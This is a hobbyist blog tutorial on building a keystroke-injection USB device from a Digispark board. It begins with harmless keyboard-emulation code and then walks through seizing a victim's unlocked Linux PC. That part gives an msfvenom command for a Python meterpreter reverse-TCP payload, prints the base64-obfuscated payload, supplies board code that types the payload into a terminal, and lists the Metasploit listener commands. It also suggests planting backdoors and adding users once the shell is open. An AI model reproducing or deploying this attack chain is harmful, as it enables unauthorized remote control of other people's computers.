DIY USB Rubber Ducky using Digispark | Digispark HID Keyboard - Make your own Rubberducky using Digispark for just $1.5. Lets get started!
Hey guys, let’s get our hands dirty. Ever heard of USB rubber ducky? Well, simply it is a programmed USB keyboard in the form of a Pendrive, which will send the keystrokes to a device connected to it and can be used to prank or even hack unlocked PCs.
Will you guys believe if I say, we can do it with a 1.5$ Arduino compatible board with simple coding without detailed knowledge on how USB works? Yes, you can make your own Arduino Rubber Ducky!
In this post, I am going to show you can do cool stuff using Arduino HID functionality. You can make your Arduino to work as a keyboard or as a mouse and do pretty cool stuff with the push of a button.
I will be showing you how you can literally hack a PC and control it remotely using this tiny board. I will share a complete tutorial, codes, and circuit diagrams in the description! The codes are also available in GITHUB so feel free to download, edit and add more functions to it. Let’s get started!
This project is sponsored by PCBWay. PCBWay is a PCB manufacturer specializing in PCB prototyping, low-volume production and neat and tidy PCB Assembly. They deliver high quality PCB faster and cheaper.
As one of the most experienced PCB manufacturers in China, they pride themselves to be our best business partners as well as good friends in the every aspect of your PCB needs.
This is Digispark. It is a light weight microcontroller development board. It comes with 6 GPIO pins, I2C and SPI serial communication and a USB interface.
It also has 3 PWM pins which can be used to control l293d motor drivers or servo motors. We can use Arduino IDE to program Digispark but the way we upload the program is a little bit different than usual.
Here, I have explained everything from the Digispark introduction to the first code upload. Check it out if you are interested!
This board can also act as HID. HID or Human Interface Devices are Devices that take input from us and pass it on to the device connected to it. HID devices include keyboard, joystick, mouse, touchpad, graphic tablet, etc.
Let’s make use of this functionality and have some fun.
I have designed a PCB that has some buttons so that I can run multiple codes without reprogramming the digispark.
This is the circuit, Since we have 5V coming out from the USB port, we don’t need additional supply. Here we have some switches, Resistors, and indicator LEDs. I will share the link of the PCB files in the description.
Getting the PCB from PCBWay
To order your PCB from PCB way, Go to PCBWay and fill the board details in the instant order form.
From there you will be directed form where you can provide more elaborate board details and Gerber upload.
Update your board requirement information in the PCB Specification screen.
You can change the board thickness, board color, silk color, and even the type of finish you want. Some of these add-ons are going to increase the board cost.
Once you have all of the various options for your PCB selected, submit it for review. Before your board goes into manufacturing their team of professional technicians will review your design for any potential errors.
Once the review is completed, all that is left is to add to the cart, make the payment, and wait for your PCBs to arrive. It could take anywhere from 3 – to 6 days to be produced depending on the number of boards you ordered.
The PCB will be manufactured and shipped within days and will be delivered to your doorstep within the mentioned time period.
Once you get the PCB in hand, all you have to do is solder the header pins and connect all the components.
Now lets install the drivers, board and library. Go to this link and download the drivers.
https://github.com/digistump/DigistumpArduino/releases/download/1.6.7/Digistump.Drivers.zip
Extract it and install the drivers
Download arduino IDE if you don’t have it. Download it from: https://www.arduino.cc/en/Main/Software
Start the Arduino IDE and go to the “File” menu and select “Preferences” and paste this line of code in the Additional Board Manager URL.
http://digistump.com/package_digistump_index.json
Go to “Tools” menu and then the “Board” submenu – select “Boards Manager” and then select “Contributed”. Select the “Digistump AVR Boards” package and click the “Install” button.
Once it completes, close the “Boards Manager” window and go to Tools→Boards and select “Digispark (Default – 16.5mhz)”.
Next we will install the Arduino Digikeyboard library which will make it easy for us to send HID commands to the PC using Digispark. This can be easily installed from the library manager itself.
Now we will start coding. Guys these are all the keystrokes you can send to your PC using Digispark using the Digikeyboard library. I will leave the link in the description because you will need to for coding!
Don’t worry if this looks confusing, you will understand better when we look into our code.
First I will show you the basic setup. Basically, we have 4 different buttons. We will assign 1 task for each button so that when one button is pressed, it will run the corresponding function and execute the task.
#include <DigiKeyboard.h>
int button1, button2, button3, button4;
void setup()
{
pinMode(0, INPUT);
pinMode(1, INPUT);
pinMode(2, INPUT);
pinMode(3, INPUT);
}
void loop()
{
button1=digitalRead(0);
button2=digitalRead(1);
button3=digitalRead(2);
button4=digitalRead(3);
if(button1==1)
{
hello();
}
else if(button2==1)
{
lock();
}
else if(button3==1)
{
notepad();
}
else if(button4==1)
{
poweroff();
}
}
void hello()
{
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.println("Hello World");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(5000);
}
void lock()
{
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.sendKeyStroke( KEY_L , MOD_GUI_LEFT);
DigiKeyboard.delay(5000);
}
void notepad()
{
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_ALT_LEFT);
DigiKeyboard.delay(250);
DigiKeyboard.println("notepad");
}
void poweroff()
{
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_ALT_LEFT);
DigiKeyboard.delay(250);
DigiKeyboard.println("cmd");
DigiKeyboard.delay(1000);
DigiKeyboard.println("shutdown /s");
}
Let’s upload and check it out.
First press button 1 and yeah! It will print hello world. Now lets try button 2 that will lock the PC. Now lets try button 3. Cool right? I will press button 4 at the end. Otherwise I will have to start everything all over again.
This way you can send keystrokes using your arduino to do some useful stuffs like media control, make your own keyboard, play pranks, or even hack PCs
Now, as promised, I will show you how to take over an unlocked PC and gain remote access to it. Please note that this is only for educational purposes and to show you how dangerous this little thing can be.
For this part, you will need a Linux PC with Metasploit installed in it. Metasploit framework is a collection of tools that can be used to write exploits and penetrate into remote machines. This tool is pre-installed in Kali Linux. In a moment, I will show you how it is done.
Next, We have to create a code which when executed in the victim’s machine initiates a connection back to our PC.
In the Terminal, execute the below command.msfvenom -p python/meterpreter/reverse_tcp LHOST=<IP ADDRESS OF YOUR MACHINE> LPORT=<PORT FOR REVERSE SHELL TO CONNECT ON> R > pythonpayload.py
Here, LHOST is the IP ADDRESS OF YOUR MACHINE and
LPORT is the PORT FOR REVERSE SHELL TO CONNECT ON
This will create a payload named pythonpaload.py.
The contents of the file looks somewhat like this
import
base64,sys;exec(base64.b64decode({2:str,3:lambda
b:bytes(b,’UTF-8′)}[sys.version_info[0]](‘aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxMC45LjcuMjA3Jyw5MDAwKSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==’)))
Now open that file and copy all the contents in the file as shown in the video.
Below is the code which is uploaded to digispark. Copy the contents of the pythonpayload.py and paste it in the 9th line.
void setup()
{
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_T , MOD_CONTROL_LEFT | MOD_ALT_LEFT);
DigiKeyboard.delay(2000);
DigiKeyboard.println(“python “);
DigiKeyboard.delay(500);
DigiKeyboard.println(“Paste the python code here”);
DigiKeyboard.delay(1000);
DigiKeyboard.println(“quit()”);
DigiKeyboard.delay(500);
DigiKeyboard.println(“exit”);
}
void loop()
{
}
Basically, what this code does is
Now, Upload the code.
Next, we have to start the listener which will wait for incoming connections in the given port. Fire up Metasploit and execute the below codes in order.
msfconsole
use multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST <IP ADDRESS OF YOUR MACHINE>
set LPORT <PORT FOR REVERSE SHELL TO CONNECT ON>
exploit
This will start the listener.
Now all you have to do is connect this digispark to our Victims unlocked machine. All you need is a 10 second window. All the codes will run in 5 seconds.
Once you get the shell, you can do almost anything with that; create a persistent back door, upload or download files, create another user and provide it SSH access, possibilities are endless.
This code works if your friend’s PC uses linux OS. Similarly we can write a code for windows too. The windows version will be updated in the link below. Follow the link in the description and you will complete complete details on the project. The codes are also available in GITHUB and feel free to download, edit and add more functions to it.
See you soon guys. See you in the next video.
The integration of UV resin into the PCB production process represents a great achievement. This… Read More
Discover essential tips for electronics engineering graduates to gain practical experience, from internships to DIY… Read More
Explore how AI is transforming digital marketing, from personalization to predictive analytics, and revolutionizing strategies… Read More
Discover how AI tools are revolutionizing industries, enhancing efficiency, and fostering innovation in our digital… Read More
February 2024 has been a landmark month in technology, with advancements that promise to revolutionize… Read More
Get expert tips to ace your 2024 Junior Networking Engineer interview. Learn strategies to impress… Read More